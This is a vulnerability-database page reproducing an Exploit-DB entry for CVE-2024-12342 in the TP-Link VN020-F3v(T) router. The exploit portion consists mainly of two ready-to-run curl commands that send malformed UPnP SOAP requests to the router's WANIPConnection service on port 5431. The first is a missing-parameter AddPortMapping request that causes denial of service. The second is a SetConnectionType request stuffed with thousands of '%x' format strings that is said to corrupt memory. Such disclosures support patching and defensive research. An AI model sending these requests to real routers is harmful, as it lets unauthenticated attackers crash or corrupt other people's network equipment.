Lucene search
K

TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

🗓️ 17 Apr 2025 00:00:00Reported by Mohamed MaatallahType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 263 Views

Critical vulnerabilities in TP-Link VN020-F3v(T) allow denial of service via malformed SOAP requests.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12342
8 Dec 202409:25
circl
CNNVD
TP-LINK VN020 安全漏洞
8 Dec 202400:00
cnnvd
CVE
CVE-2024-12342
8 Dec 202406:31
cve
Cvelist
CVE-2024-12342 TP-Link VN020 F3v(T) Incomplete SOAP Request WANIPConnection denial of service
8 Dec 202406:31
cvelist
EUVD
EUVD-2024-50787
3 Oct 202520:07
euvd
NVD
CVE-2024-12342
8 Dec 202407:15
nvd
Packet Storm
📄 TP-Link VN020 F3v(T) TT_V6.2.1021 Denial of Service
17 Apr 202500:00
packetstorm
Positive Technologies
PT-2024-9297 · Tp Link · Tp-Link Vn020 F3V
8 Dec 202400:00
ptsecurity
RedhatCVE
CVE-2024-12342
23 May 202509:26
redhatcve
Vulnrichment
CVE-2024-12342 TP-Link VN020 F3v(T) Incomplete SOAP Request WANIPConnection denial of service
8 Dec 202406:31
vulnrichment
Rows per page
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342


Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.

Proof of Concept 1 (Missing Parameters DoS):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'

Proof of Concept 2 (Memory Corruption):

curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
     -H "Content-Type: text/xml" \
     -H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
     -d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
    </u:SetConnectionType>
  </s:Body>
</s:Envelope>'

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.1
CVSS 3.16.5
CVSS 47.1
CVSS 36.5
EPSS0.12213
SSVC
263